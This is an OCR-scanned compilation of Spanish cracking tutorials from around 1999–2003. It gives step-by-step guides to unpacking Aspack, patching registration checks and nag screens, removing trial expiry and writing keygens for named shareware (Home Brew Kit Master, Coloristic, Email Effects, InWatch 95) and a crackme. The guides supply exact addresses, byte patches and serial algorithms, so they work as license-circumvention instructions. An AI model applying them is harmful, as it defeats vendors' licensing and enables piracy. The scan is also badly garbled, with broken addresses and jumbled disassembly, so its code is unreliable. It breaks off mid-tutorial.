Len(vARIANT|Double:8710) returns LONG:7793016 

Len(YARIA4NT|Double:85710] returns LONG:7793016 

Len(vARIA4NT bee returns LONG:7793016 
Len(YARIA4NTID ouble:1 4420] returns LONG:7733016 
LenfVARIANT returns LONG: 7793016 
Len VARIANT retums LONG:7793016 
Len(vARIANTiDouble:69680] returns LONG:7733016 
Len(YARIA4NT Double: 0) returns LONG:7793016 
LenfVARIANT:Double: 139360) retums LONG:7793016 


Len(vARIANT:Double:139360] retums LONG:7733016 
Len(YARIANT:D ouble: 278720] retums LONG:7793016 


do 
Le 
Lo 
% LenVARIANT:Double:278720]/retums LONG:7793016 
% Len(VARIANT:Double:557440)lretums LONG:7793016 
Lo 
do 
Lo 
Lo 
do 


ybbo4bo..e. y 
Lo fe Le Le fe £e Le £e ía 


Len(YARIANT:D ouble:557440) retuma LONG:7793016 

Len(váR ANTeuble 114860500) retumns LONG:7793016 
Len(vARIANT Double 114888+006] returns LONG:7793016 
Len(YARIANT:Double:2.22376e+006] returns LONG:7793016 


Len(YARIANT:Double:2.223976e+006] returns LONG:77393016 


el RATUARIT Mil A AE OOO tc MAI RINA 


Bueno, parece fácil, no?. 4355 * 2 = 8710; 8710 * 2 = 17420; etc. etc. etc...., pero 
cuan- tas veces realiza esta operación?, 36 veces, al final dá un número LONG que 
parece ser el número de serie deseado, veamos, despues de la larga cuenta, nos 
arroja: 748183302963- 20, parece un numero de serie en toda regla, pero aún no 
acaba la cosa aquí, porque si en- tramos este LONG, nos lo escupe con los siento 
Burt Lancaster, la cagaste. :) Así pues, con tinuamos. 


$% LenvAHIAN IU OUDIe: /.491938+U13) retums LUNA: /¿33U Ib 
$% Len(VARIANT:Double:7.48183e+013) retums LONG:7793016 


Len(ARIANT:Double:1.49637e+014) returns LONG:77393016 
Ea txtCode.Text 
Ela txiCode.Text 


Aqui, subrayadito esta: 149637e+014, o sea: 149636660592640, 
Uallllaaaaaaaaaa!!!!. Exito total, lo entramos y.... Thanks!!! el mensaje feliz! Yatá, I 
got it!!! That's all folk!!!. 


Pero que ha hecho?. Lo ha reducido. Mientras la cifra final sea mayor que 
200000000000000H, cifra = cifra /2, esto os lo digo yo que me lo he curra o:) 


Bien ya tenemos todos los ingredientes para confeccionar el KeyGen. Amos allá! 


Suma=Asc(ler. caracter nombre) + asc(cadauno de los caracteres del nombre), 
tantas veces como letras tenga el nombre. En Basic seria algo así: 


L=Len (nombre$) .......... Longitud del nombre. 


(cod.asc.primer.caracter) btt = Asc(left$(nombref$, 1)) ... en nuestro caso: 85 


Ahora vamos a buscar el número sagrado que se vá multiplicar 36 veces. Sería algo 
asi: 


Forx=1ToL 


ef = Asc(MidS(nombre$, x, 1)):....en e se lamacena el ASCII de cada caracter del 
nombre 


suma+t = sumatt + ef + bH 


Next 
Ok!, en suma tenemos yá almacenado el numero dorado, 4355 


La segunda parte es: 


Forx=1 To 36 
suma+ = suma+ + suma+t 
Next 


suma+t = 74818330296320, pero no nos vale. 
la tercera parte del keygen es: 


While suma? >= 200000000000000+ 
suma+t = suma+t / 2 
Wend 


Ahora suma+f contiene el serial correcto para ese nombre: 149636660592640 


y ya hemos confeccionado el KeyGen. No es ná, gracias y tá otra! 


Programa: Po 2.12 (Para Newbies-1) 


id Todo lo que nos depara el Aspack 2.12 
PEER Ni hablar. ¿No lo hice yo? 


OWNLOAD : ttp://www.theabsolute.net/sware/files/hbkms.exe 


Herramientas: |sice, PeiD 0.8, Hiew , IceDump , Peditor 1.7, W32Dasm 


CRACKER: Tomasino | FECHA: AS 


Preliminar: 


Unas palabras antes de entrar de a lleno en materia. Este trabajo debió salir antes de el que le precede 
“Asprotec para Newbies-1” http://www .crackmanworld.com/-cracking/empacado/TomaS- 


Asprotectl.2.2.rar 
que hablando en plata es mucho más complicado que Aspack 2.12. Pero como entre a la Web para 


bajar el asprotect y vi el Aspack 2.12 me embulle a hacer lo mismo con este. En fin son dos tutes son 
independientes cada uno y se puede leer por separado. Si leyeron el otro este le será muchas más fácil 
y el que no pude hacer este y seguir con el otro. Las explicaciones son mucho más pormenorizadas en 
el anterior ya que no quise repetir todo otra vez. Lo último, este es un trabajo hecho por un newbie 
que esta tratando de aprender por lo que no esperen un trabajo “de punta”, más bien el proceso que he 
seguido para tratar de ir aprendiendo algo. 


Primera víctima: Home Brew Kit MASTER 1.4 


(http://www .theabsolute.net/sware/files/hbkms.exe). 


Es evidente que esta gente no ha hecho mucho esfuerzo por proteger su producto. Dejándole toda la 
tarea a Aspack cosa frecuente donde se le confía toda la tarea de protección al packer y una vez 
quitado este es cosa de niños. Pero bueno usamos esta aplicación porque tiene lo que nosotros 
queremos, que es que este empacada con Aspack 2.12 lo que es suficiente para nosotros. Seré breve 
y explicare solo que hagamos de forma diferente. 


D Sacar los datos que nos hacen falta 
e Image Base =400000 
e ImageSize =D2000 
e Virtual Size =>Este lo buscamos de forma diferente, ya verán 


II) Cargo la aplicación en el Sice y en cuanto rompe pongo “MAP32 HBKM” 
lo que nos permite ver las secciones de la aplicación desde dentro del Sice y de allí 


sacamos los intervalos para poner el BPR 


016F:004CF016 DCOF FMUL REAL8 PTR [EDI] 
016F:004CF018 7E83 JLE 004CEF9D 
016F:004CF01A 3F AAS 

016F:004CF01B  C2FC3B RET 3BFC =- 
:MAP32 HBKM 

Owner Obj Name .0ObJ* Address Size Type 
HBKM CODE 0001 0177:00401000 0009E000 IDATA RW 
HBKM DATA 0002 0177:0049F000 00002000 IDATA RW 
HBKM BSS 0003 .0177:004A1000 00006000 IDATA RW 
HBKM .«idata 0004 0177:004A7000 00003000 IDATA RW 
HBKM .tls 0005 .0177:004AA000 00001000 IDATA RW 
HBKM .rdata 0006 .0177:004AB000 00001000 IDATA RW 
HBKM .reloc 0007 0177:004AC000 0000B000 IDATA RW 
HBKM .rsrc 0008 .0177:004B7000 00018000 IDATA RW 
HBKM .aspack 0009 0177:004CF000 00002000 IDATA RW 
HBKM .data 000A 0177:004D1000 00001000 IDATA RW 


Y como se ve en las secciones, he marcado las en rojo donde comienza y se acaba la 


primera que debe 


contener el OEP. 


BPR 401000 49F000 r if(eip>= 401000) £% (eip<=49F000) 
dos saltos y vemos esto 


016F:0049E700 


EBPÉ OEP=9E700 


016F:0049E701 
016F:0049E703 


55 


8BEC 


83C4F4 


EBP,ESP 
ESP, -0C 


016F:0049E706 53 PUSH EBX 


016F:0049E707 B858E44900 MOV EAX, 0049E458 
016F:0049E70C  E83F81F6FF CALL 00406850 
016F:0049E711 8B1D9C084A00 MOV EBX, [004A089C] 


III Sobre la línea É 016F:0049E700Á ponemos 
/¡DUMP 1000000 D2000 C:/dumpeado.exe 


IV)  Copiamos el dumpeado.exe en directorio donde esta el empacado. 
V)  Igualar las secciones con el Peditor 1.7 y cambiar el OEP=9E7000. 


Lo de siempre, lo probamos y si todo lo hicimos correctamente funciona. Por lo que aquí acaba el 
desempacado totalmente. Ahora quedan dos limitaciones que las he visto en la ayuda de la 
aplicación. 


e Un vencimiento de tiempo. 
e Y una función deshabilitada. 


En esto seré muy encuesto ya que es muy sencillo. Cada uno puede hacerlo como crea, buscar el 
serial, habilitar la función etc etc. Yo buscare el “MEMORY FLAG”. Primero miramos las 
propiedades de las secciones y les cambiamos sus características de anti-desensamblado de 
C0000020 a E0000020 para que el W32DASM pueda abrirlo. Y buscamos en las “Strn Ref” y 
vemos algo así................. "This function is only available " , la buscamos en el desensamblado y 


caemos e€N........... 


:00499DF1 803D08054A0000 cmp byte ptr [004A0508], 00==>Esta es la clave del tema 
:00499DF8 7524 jne 00499E1E 

:00499DFA 8B5508 mov edx, dword ptr [ebp+08] 

:00499DFD 8BD8 mov ebx, eax 

:00499DFF 8BC3 mov eax, ebx 

:00499E01 8B10 mov edx, dword ptr [eax] 

:00499E03 FF92D0000000 call dword ptr [edx+000000D0] 

:00499E09 8B832C020000 mov eax, dword ptr [ebx+0000022C] 


* Possible StringData Ref from Code Obj ->"This function is only available " 
-=>"with the registered version." 


:00499E0F BA2CA04900 mov edx, 0049A02C 
:00499E14 8B08 mov ecx, dword ptr [eax] 
:00499E16 FF5134 call [ecx+34] 

:00499E19 E9D4010000 jmp 00499FF2 


Veamos en estas líneas esta la clave de todo 


:00499DF1 803D08054A0000 cmp byte ptr [004A0508], 0O0==>Esta es la clave del tema 
:00499DF8 7524 jne 00499E1E 


Este es el “Memory Flag” lo que quiere decir: 


[004A0508]=0 É no registrado 


[004A0508]=1 E registrado 


Aquí muchos pudieran querer forzar el salto y de seguro que resulta, pero el programa puede querer 
verificar otra vez y vería que no estamos registrados. ¿Cómo hacemos? Pues sencillo buscamos a 
[004A0508] en el desensamblado y forzamos a [004A0508] que tenga un valor distinto de 
cero y debe funcionar. Manos a la obra. 


* Referenced by a CALL at Address: 


| :0049397C 

:004938F8 C60508054A0001 mov byte ptr [004A0508], 01É zona clave, esto debe 
ejecutarse 

:004938FF C6050C054A0001 mov byte ptr [004A050C], 01 

:00493906 C3 ret 


Vemos de donde viene el salto É 0049397C 


:00493970 BAE0O3D4900 mov edx, 00493DEO 

:00493975 EBSFE04F7FF call 00403E78 

:0049397A 7505 jne 00493981==>Si hay salto no mete el uno en el 
Memnmery. . 

:0049397C E8S77FFEFFFF call 004938F8 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0049397A(C) 


:00493981 8D4DF4 lea ecx, dword ptr [ebp-0C] 


Pues quitamos el salto y debe estar todo resuelto. De esta forma 7505É 7500, lo que tenemos es un 


Bueno hasta la próxima. Esperamos que de algo les sirva esto como paso conmigo. Los saludos de 
siempre. A eSn-min , Silver, El Profe_X, Viper y a Caos. 


Titulo: 


Crackeando Coloristic 1.2 
Url del Programa: <http://www.bubblepop.com> 


|[Autor: Algarete 
|E-Mail: jry4k 4ehotmail.com 


|Nivel: Facil(x) Medio() Dificil () 


Utilidades: W32Dasm 8.9 y WinHex (o el de tu preferencia) 


Manos a la obra!. 


Primero que nada hay que investigar que tipo 


de proteccion lleva el programita este, 


lo abrimos ohh 


y que vemos no se si a ustedes pero a mi me salio un Reminder 
olvidemonos del nag y vamos a 


o un nag como lo quieran llamar , 
Help->Register... 
poner el nombre y serial. 
en mi caso "Algarete" y serial 
un click a Register y shit "You have entered an invalid..... M 


"12345" 


y como siempre no sale la tipica ventanita de 
oka! pongan cualquier nombre en el name 
(usa el que quieras) 


damos 
oOkA 


Ahora abrimos el W32Dasm y abrimos el Coloristic 1.2 damos click 
en String References y buscamos y no muy distante vemos nuestro 


mensaje de Error, 
Registering your copy... 


nos gusta 


* Possible Reference to String Resource ID=00500: 


y Caemos aqui: 


ohh pero que veo, 


registering your copy of Coloristic and showin" 


:00403C28 


68F4010000 


Caemos aqui! 


:00403C2D 
:00403C30 
:00403C31 
:00403C36 
:00403C37 
:00403C38 
:00403C3B 
:00403C3C 
:00403C3F 
:00403C42 
:00403C43 
:00403C48 
:00403C49 
:00403C4A 


oka, pero 
vemos: 


:00403C0C 
:00403C0F 
:00403C10 
:00403C13 
:00403C14 
:00403C17 
:00403C1C 
:00403C1F 


8D45F0 

50 
E80AE8FFEFF 
59 

59 

8D45F0 

50 

8B459C 
8B4004 

50 
E8B8E4FFEFF 
59 

59 

8D4DFO 


aqui no veo nada cool, 


8D45E4 
50 
8D45DC 

50 

8B4D9C 
E8E41C0000 
8B459C 
83B8D800000000 


push 000001F4 


lea eax, dword 
push eax 

call 00402440 
pop ecx 

pop ecx 

lea eax, dword 
push eax 

mov eax, dword 
mov eax, dword 
push eax 

call 00402100 
pop ecx 

pop ecx 

lea ecx, dword 


asi que subimos 


lea eax, dword 
push eax 

lea eax, dword 
push eax 

mov ecx, dword 
call 00405900 
mov eax, dword 


tambien veo esto "Thank you for 
." damos click a ese mensaje que es el que 


"Thank you for 


[ebp-10] 


ptr [ebp-64] 


[eax+04] 


ptr [ebp-10] 


un poquito a ver que 


ptr [ebp-1C] 


ptr [ebp-24] 
ptr [ebp-64] 


ptr [ebp-64] 


cmp dword ptr [eax+000000D8], 


00000000 <-- interesante 
:00403C26 7448 je 00403C70 <<-- Super 
interesante, que tal si nopeamos este salto? 


* Possible Ref to Menu: MenulD_0064, Item: "About Coloristic" 


* Possible Reference to String Resource ID=00500: "Thank you for 
registering your copy of Coloristic and showin" 


:00403C28 68F4010000 push 000001F4 

:00403C2D 8D45FO lea eax, dword ptr [ebp-101 
:00403C30 50 push eax 

:00403C31 E80AE8FFEFF call 00402440 


en el w32Dasm marcamos la direccion ":00403C26 7448 

je 00403C70" 

y miramos el offset vemos que es (00003026h) apuntamos la direccion en 
el WinHex 

(Position -> Go to Offset) 3026 y Caemos en 7448 lo nopeamos osea 
enves de 7448 

escribimos 9090 y listo , abrimos el prog. escribes tu nombre cualquier 
serial 

y Crackeado!! ¡) Facil no crees? 


Cracked by Algarete. jry4k 4ehotmail.com 


BIEN! ! Archivo Creado 
Junio 17 2002 


Como crackear y hacer un keygen para el abex' 2nd crackme 


Para empezar no creo que haga falta decir que esta hecho en vb no solo por que nos damos 
cuenta intuitivamente por una serie de cosas y el sexto sentido cracker sino por que lo primero 
que tenemos que hacer a la hora de crackear un fichero es saber sus características ok?. Bueno 


como esta hecho en VB vamos a probar a ver que pasa con el SmartCheck y vemos si podemos 
sacar el serial. 


Abrimos el Smartcheck y lo configuramos como dice mi tutorial sobre smartcheck si no los 


tienen bajen lo dewww.zencracking.com.ar. Una vez bien configurado, le damos a Run y vemos 
algo como esto: 


%; NuMega SmartCheck - Program Error Detected ax 
API failure 
DpenE venta, retumed Ox00000000 
LastError: El nombre de archivo, directorio o etiqueta del volumen no es válido. [123] 


soto | o | ea | E E 
J Suppress... End Explain fa] 


Press F1 for help 


Como pueden ver la aplicación ha generado algunos errores, perono hay problema solo aprieten 
en Acknowledge hasta que se vallan los errores y listo. 
Bueno una vez pasados los errores aparecemos aca: 


Ingresamos como serial cualquier cosa de + de 4 caracteres P ej gr0Ovy y como serial P ej 
123456. 
Apretamos Check y vamos al Smartcheck a ver que es lo que hizo 


$ Len ARIANT:S tig "00" rele LONG: 6550389 
$ Len VARIANT:Stirg:"9:004/"] returrs LONG:6550389 

2 Integer (1) > Lorg (1) 

$0 Mid WARIANT:Sting "gl", long1. VARIANT Integeas:1] 
+2 As[Stng"'g") retenes Integer 103 

+$% Hex ARLANT Integer 203] 

2 Integer (2) > Long (2) 

+ MidWaRIANT-Stbng "gl", long-2, VARLANT Integer: 1] 
+2 Asc[Sung"T"] reluens Integer 114 

4d Hex ARIANT: integer 214) 

A Integer [3] > Long (3) 

$0 Mid WARIANT:Sting "gU0 ey", long, VARLANT Integer: 1] 
$ AsclSting "WD" retums Integer 48 

4d Hex ARIANT: integer 148) 

2 Integer(8] > Long (4) 

4 Mid ARIANT Sting "giDO 3", longiá, VARLANT:Integer:1] 
4% Asc[Sting"0") rebume Integer 48 

4d Hex VARLANT: Integer 148) 

Sd Milo VARISNT Sting "Nope, th... Itegerú, VARLANT:Sting"Wiiong se..." VARIAR 


Vemos que saca el largo del nombre, luego saca el valor de la primera letra, pasa a ascii (queda 
103) luego le suma 100 y queda 203, luego a ese valor lo pasa a hexadecimal y queda CB, esta 


accion se repite con las 4 primeras letras del nombre asi que vallan reemplazando y van a sacar 
el serial ok? 


Como hacer el Key Gen??? 


Ya que estamos lo vamos a hacer en VB6 o 5 o lo que sea, abrimos el VB y creamos un exe 
estándar, luego agregamos 2 textbox (opcional 2 labels conlos textos “Nombre” y “Serial”) y un 
boton. Quedaria asi: 


DIE alo 


Nombre: 


| ardOyy 


Serial 


Í CBD63494 


y 


Abex crackme 2 

Key Gen por grD0vy 
Para mas crack ir a: 
mia. zencracking.com.ar 


Bueno ahora ingresamos el codigo, que esta bastante explicado en los comentarios del source, 
pero iguan voy a explicar las sentencias que mas o menos pueden llegar a ser medio 
desconocidas para la gente no muy experimentada, pero esto no es un manual de vb asi que si 
no saben busquen uno. 

Pasamos direto a la generación del serial. 

Tenemos la siguientes funciones para crear el serial: 

Mid(“texto” 1,1) 


Esta funcion (mid) sacaria empezando desde el carácter numero 1, 1 carácter o sea que saca 
solo 1 carácter que es “t” no se si se entende? O sea que si yo pongo Mid( “texto”, 1, 3) sacaria 
la cadena “tex” ok? 

Bueno tambien esta la funcion ASC(“texto”) que convierte a codigo ASCII las letras que 
extrajimos de la funcion mid(). 

Por ultimo esta la funcion Hex() que convierte los valores a Hexadecimal. 

Todas las funciones mencionada se pueden escribir en una sola linea ahorrando tiempo y 
memoria. 

Hex(Asc(Mid(Text1.Text, 1, 1))) 

Esto sacaria el ler caracter del text1, luego lo pasa a ASCIl y por ultimo a HEXADECIMAL 


Cracker: gr0Ovy 

E-mail: groovy26000yahoo.com.ar 

WEB: www.zencracking.com.ar 

Salu2 a: S[h]iff, Marduk, chAn, ca0Os, FiReRaln, ][-][UNTER, Qqmelo, Powertech. Y bueno si me 
olvido de alguien ponga su nick aca (de donde saque esto????) 

Bueno tb saludos a la gente buena que hay en inet no solo a los mal0rs ; ) 

Ademas saludos a Wkt!, TNT!, Karpoff, S2K (siempre la solucion a mi vagancia: =), y bueno no 
se a quien mas seguro que me olvido de alguien. 

CHASU y nos vemos mas adelante con el tuto de cómo crackear el S2k nuevo que es bastante 
interesante de por cierto. 


Tutorial N* 3 (correción) 


Programa: Email Effects Versión 1.6 
Descarga: http://www.sigsoftware.com 
Objetivo: Sacar todo lo que nos moleste 


Herramientas necesaria: W32Dasm, OFFset CALculator (para determinar alguna dirección solo si lo 
necesitas), Softice, Hiew (editor hexadecimal) y Resource Hacker. 


Dificultad: Newbie 
Fecha de corrección: 29/05/03 
Cracker: Prometeo 


Este tutorial está realizado únicamente con fines educativos, y si sé te ocurre por esas casualidades realiza 
este crack ya sea para fines económicos o personales tú eres el único responsable. Así que si te gusta el 
programa ya sabes debes comprarlo. 


Introducción: 


Con este programa lo que podemos hacer es crear arte ascii a partir de fotos o dibujos, tan solo con copiar al 
porta papel lo que queremos representar y luego pegarlo en email effects y listo. 


La manera en que funciona este software es muy simple representa caracteres en lugar de los pixeles del 
dibujo o foto. 


Tras recibir un e-mail de un lector me enteré de un error que cometí este tuto, que no creí haberlo cometido, 
sepan disculpar, pero lo que paso es que como a los tutorial que hago los voy realizando de a pedazos, ya 
que no dispongo de mucho tiempo libre para escribirlos de una, y al parecer en este caso, cuando retorne a 
escribir nuevamente, no continué el texto de la manera que en un principio había pensado. 


En la manera en que estaba quitada la nag que aparece cada ves que iniciamos el programa, eliminábamos 
del inicio la nag, pero también desde el about). 


Del error cometido se presentan dos soluciones diferentes para obtener los mismos resultados (la solución 
que pensaba colocar en este tuto en un principio y la segunda solución es la sugerencia que me envió el 
amigo Belzebu), las correcciones son las escritas en color verde. 


Hecha la ley..... 


Los puntos limitantes y molesto entre otras cosas de esté programilla son: 


e Pantalla de bienvenida (darnos la bienvenida la primera ves que utilizamos dicho software no esta 
mal, es más esta muy bien pero que también nos digan que "Email effects es shareware - si usted 
lo usa, lo obliga a que compre una licencia (vea ayuda por detalles)", esto si es una guachada la 
primera ves que lo ejecutamos y ni siquiera lo utilizamos y ya no están diciendo que lo 
compremos?. 

e Ventana molesta que aparece cada ves que iniciamos el programa, dicha ventana es la misma que 
aparece en about del programa (esta ventana nos informa que dicho programa esta sin registrar y 
por favor lo registremos, además se nos informa la dirección de la pagina web de los creadores, 
también tenemos 5 botones en cual uno nos proporciona ayuda de como comprar el programa, los 
dos que le siguen a continuación distintas formas de compra " me parece que esto muchachos 
están obsesionados en que compremos su programa esto me esta empezando a hinchar las 
pelotas, bueno y los dos últimos botones son uno de ayuda y el otro nos quita esta ventana molesta. 

e Por ultimo lo que nos queda es la protección por expiración del programa luego de pasado los 28 
días de su uso, entonces después de que cada ves utilicemos el software nos aparecerá una ultima 
ventana en que se nos informa que el periodo de prueba ya a finalizado y que tenemos que 
comprarlo a como de lugar, lo digo de esta manera por que no hay ninguna de cerrar esta ventana 
(salvo ctrl+alt+F4 y finalizar el proceso) o sea que la única alternativa que nos dan es la compra con 
los tres botones de compra antes nombrados. 


Hecha la trampa 


Como ya sé a dicho el objetivo en esté software será la de eliminar todo lo que no moleste o no sea de 
nuestro agrado, en pocas palabras modificar el ejecutable de manera que queda a nuestro antojo. 


Los puntos a tratar son: 


e Eliminación de pantalla de bienvenida 

e Sacar la ventana de about que aparece cada ves que se inicia el software 
En la ventana de about eliminar todo botones relacionado con la compra del software + estar 
registrado y que aparezca nuestro nombre. 

e Eliminación de la ventana de expiración 


Creo que eso es todo bueno basta de hablar y a crackear. 


Modificando el programa víctima a nuestra medida 


En primer lugar procederemos a desensamblar al ejecutable para la posible identificación de alguno de los 
punto mencionado a tratar, ya sea por identificación de string ref, menu ref, dialog ref o en su defecto si 
encontramos alguna dirección interesante en el softice y con está poder analizar el código en el listado 
muerto. 


Para comenzar cargaremos nuestro ejecutable víctima en el loader del softice (siempre y cuando no 
hallamos ya utilizado email effects ya que si lo hemos utilizado no nos mostrara la caja de dialogo de 
bienvenida que queremos pescar mediante break point para su posterior eliminación, la manera de que se 
vuelva a mostrar la ventana se consigue eliminando la rama del registro 
HKEY_USERS1DEFAUL T SoftwareiSig Software ya que es aquí donde queda asentado que ya fue 
ejecutado) y estableceremos varios break point como x ej. getdlgitem , dialogbox, dialoboxparama, etc. 
Continuamos con la ejecución del programa con F5 y ya estamos dentro con el break point 
DialogBoxParamaA del softice en USER32.dll le damos a F12 para retornar dentro del programa y vemos que 
nos aparece la ventana que queremos eliminar, le damos al botón de OK y volvemos al softice si miramos 
por encima del call [USER32!dialogboxparama] y veremos un salto condicional como: 


:0040A4414 85DB test ebx, ebx 


:0040A416 7428 je 00404440 (no jump) no se produce el salto lo que nos lleva a ver la mugrosa ventana 
que queremos quitar, como solución para evitarla es cambiar el salto condicional por uno incondicional. 


Bueno el segundo punto a tratar es el de sacar la ventana de about que aparece cada ves que se inicia el 
software, debemos tener especial cuidado ya que si nos mandamos alguna cagada esto se reflejara en la 
estética del about del programa como así también su funcionamiento. 


Mi Solución: 


Volvemos a cargar nuevamente en el loader el ejecutable y colocamos varios break point como por ej. 
getdlgitem , dialogbox,showwindow, dialoboxparama, etc. Presionamos F5 y caemos dentro del softice con 
el break point showwindow, le damos a F12 y aterrizamos en: 


* Reference To: USER32.ShowWindow, Ord:0265h 


:00411E44 FF15E4654800 Call dword ptr [004865E4] 
:00411E4A 83C430 add esp, 00000030 <= aqui 
:00411E4D 5B pop ebx 

:00411E4E C3 ret 


El ret que vemos nos quiere decir que seguimos dentro de un call entonces o presionamos F12 nuevamente 
para retornar del call o traceamos hasta salir del call; 


:00408E76 8B6C2438 mov ebp, dword ptr [esp+38] 

:00408E7A 8B5C243C mov ebx, dword ptr [esp+3C] 

:00408E7E 8B4C2430 mov ecx, dword ptr [esp+30] 

:00408E82 890D88214200 mov dword ptr [00422188], ecx 

:00408E88 E8C38E0000 call 00411D50 

:00408E8D ESAEDEFFFF call 00406D40<=caemos aqui, el call inmediato superior es de donde venimos 
:00408E92 ESC99FFFFF call 00402E60 


:00408E97 890424 mov dword ptr [esp], eax 


:00408E9A 85C0 test eax, eax 
:00408E9C 0F852C010000 jne 00408FCE 
:00408EA2 E829150000 call 0040A3DO 
:00408EA7 E8C41E0000 call 0040AD70 


:00408EAC 6869574545 push 45455769 


Se puede observar que una ves que salimos del call, podemos ver que es creada la nag a eliminar, x lo tanto 
la manera del eliminar esta nag es nopeando el call en donde aparecemos. 


Esta es la manera en que en un principio crackeé el programa, solo que cuando me puse a escribir el tutorial 
ya había pasado mucho tiempo desde que lo crackeé y además como el tema lo deje a medio hacer, cuando 
retorné a volver escribir, leí así no mas lo escrito y continué el texto de manera errónea. 


Tb reconozco que mi error fue el de después de haber terminado el tuto no haber verificado si todo lo escrito 
era correcto. =) 


La solución propuesta x Belzebu: 
En el W32DASM podemos ver que la llamada para hacer esa 


ventana se hace tanto en |:00407060 ,como en :00408E88. 
Si en Softice ponemos un bpx en esas 2 direcciones vermos 
que rompe en 00408E88 (Nag del principio). 


* Referenced by a CALL at Address: 
1:0041E0F2 

| 

:00408E70 53 push ebx 

:00408E71 56 push esi 

:00408E72 53 push ebp 

:00408E73 83EC20 sub esp, 00000020 
:00408E76 8B6C2438 mov ebp, dword ptr 
[esp+38] 

:00408E7A 8B5C243C mov ebx, dword ptr 
[esp+3C] 

:00408E7E 8B4C2430 mov ecx, dword ptr 
[esp+30] 

:00408E82 890D88214200 mov dword ptr 
[00422188], ecx 

:00408E88 E8C38E0000 CALL 00411D50 ==>NOPEAR 
:00408E8D ESAEDEFFFF call 00406D40 


Bastará con modificar en 00408E88: ESC38E0000 x 
9090909000. 


El tercer punto es la eliminación de los botones de compra y lograr estar registrado, para ello vayamos al 
listado muerto en W32Dasm y nos fijamos en String ref y busquemos algo relacionado con el registro y 
encontramos: Unlicensed — 


Licensed to : 


Cliqueamos sobre Licensed to:, verificamos haciendo varios click sobre el string para ver si hay varios ref 
pero solo encontramos una en 412627 miramos un par de líneas arriba de esta dirección y damos con una 
referencia a un salto condicional en 4125F4 tomamos nota de esta dirección y después verificaremos de que 
se trata. 


De la misma manera que hicimos con Licensed to: lo hacemos para Unlicensed — y también encontramos la 
ref a un salto condicional en 4125C7 lo anotamos. A priori se puede decir que el salto en 4125c7 siempre se 
realizara lo que nos mostrara en la pantalla de about como Unlicensed — y el segundo salto no se producirá 
evitando que estemos Licensed to:. 


Carguemos en el loader el programa y coloquemos bpx en las dirección que tomamos notas y probemos 
todo lo dicho. Podemos ver que en el primer salto se cumple lo que dije x lo tanto nos lleva a estar 
Unlicensed — para evitar esto, invertimos el salto con r fl z (realizamos esto estando sobre el salto) seguimos 
con la ejecución del programa con F5 y llegamos al segundo bpx en 4125F4 que en el no se produce el salto 
pero si seguimos un poco el código podemos ver que hay un par de call mas abajo para repetir esta rutinas, 
así que también invertimos el salto al igual que el anterior para que si nos muestre como Licensed to:. 


Listo ahora si los cambios que realizamos en memoria lo hacemos con un editor hexadecimal y en el about 
aparecemos como Licensed to: pero nosotros queremos también que aparezca nuestro nombre ] , para esto 
nos valemos de Resource Hacker ya que esta herramienta podremos manipular los string fácilmente e 
ingresar nuestro nombre dentro del mismo string. Para ello abrimos el ejecutable con esta utilidad, y nos 
mostrara cada recursos del software como carpetas, vamos a la carpeta String Table y seguimos buscando 
dentro de esta la sub-carpeta que contenga el string que diga Licensed to: y lo editamos para que lo muestre 
como Licensed to: Prometeo, le damos al botón Compile Script y salvamos los cambios. 


Ahora si ejecutamos el programa y la ventana de about la veremos como de manera similar a: 


About Email Effects 


e 


Ena Edects 


Vamos llegando al fin de esté tuto solo nos que tratar la eliminación de la ventana de expiración a los 28 días 
de uso, para ello adelantemos la fecha de la compu para que el programa caduque luego colocamos en el 
loader un bpx en dialogboxparama, cerramos a email effects y saltara el softice ya que tendría que aparecer 
la caja de dialogo que nos indica la expiración del soft y con el bpx saltamos antes de está, le damos a F12 
para volver el programa y nos muestra la ventana con tres botones le damos un click a cualquier botón y 
llegamos a donde queríamos, miramos un poco arriba y encontramos: 


:00413054 6685F6 test si, si 


:00413057 7415 je 0041306E 


:00413059 668B03 mov ax, word ptr [ebx] 


:0041305C 89442414 mov dword ptr [esp+14], eax 


:00413060 663B7C2414 cmp di, word ptr [esp+14] 


:00413065 7F07 jg 0041306E 


:00413067 663B6C2414 cmp bp, word ptr [esp+14] 


:0041306C 7D78 ¡ge 004130E6 


Se puede ver que estos tres salto apuntan a una misma dirección y que si llegáramos a esta evitaríamos la 
dichosa ventana molesta x lo tanto con solo cambiar los saltos condicional x incondicional se acabaran con 
los problemas de tener que ver que ya se expiro el programa. 


Programa: InWatch 95 Relase V1.3a 


PROTECCION: Name / Serial 


Descripcion: Programa Para Monitorear el systema, bueno para comprobar los 
cambios que hacen los programas al instalarlos. 


DOWNLOAD : 
http://members.xoom.com/ XOOM/kf karpoff/Utilidades/Installw.zip 


Softice v3x+, W32Dasm , Editor Hexadecimal 11/09/99 
INTRODUCCION 


HH Tutoríal de Crackeo Para Newbies desde Cero 11/09/99 
Por Karpoff Hit PROYECTO 9 HH 


Hola a todos/as !!! Lo primero decir que esto no va ha ser un 
manual como los anteriores, voy a intentar demostraros el poco 
interés que ponen la mayoría de los programadores en proteger su 
software, y por lo tanto la mierda de software que nos quieren 
meter. Conocéis alguna utilidad con licencia shareware que merezca 
la pena pagar¿? Yo realmente no. 


Siempre que queremos petar un programa los newbies (novatos) 
pensamos que tiene que ser super complicado encontrar el punto 
donde atacar al programa, generalmente queremos petarlo antes de 
empezar, con lo cual se nos cierra el cerebro y no vemos mas halla 
de nuestra totxa, os aseguro que si os tomáis las cosas con Calma y 
probáis a modificar en un programa todo lo que creáis que os puede 
beneficiar en cuanto a la limitación se refiere, podéis flipar, a 
parte de aprender muchisimo os divertiréis viendo como puede llegar 
a actuar el programa que modifiquéis. 


La víctima InWatch 95 Relase Vl1l.3a parece ser una utilidad para 
seguir instalaciones, pudiendo ver todo lo que se modifico con una 
instalación tal, y recuperando el estado anterior a la instalación. 
Parece que tiene funciones de editor y algunas cosas mas, ( el caso 
es que no conocía este programa y no he tenido la ocasión de 
probarlo). Lo podéis coger de: 


http://members.xoom.com/_X0OOM/nakarko/inversa/proggies/Installw.zip 


Este es un programa limitado a 30 días, nos arranca con un nag para 
decirnos que es una versión sin registrar y una vez aceptado nos 
muestra un nuevo nag soltándonos otra vez el rollo de su limitación 
a 30 días. 


Ataques: vamos a sacar con el Softlce un numero de registro valido 
para el nombre que metamos, el proceso que voy a utilizar para 
capturar el S/N no es corriente, se trata de que sepáis que se 
puede crackear sin sequir el típico proceso de buscar la rutina de 
comprobación y a partir de hay comparar el reg falso con el valido. 


Os explico como lo haremos, se trata únicamente de buscar en la 
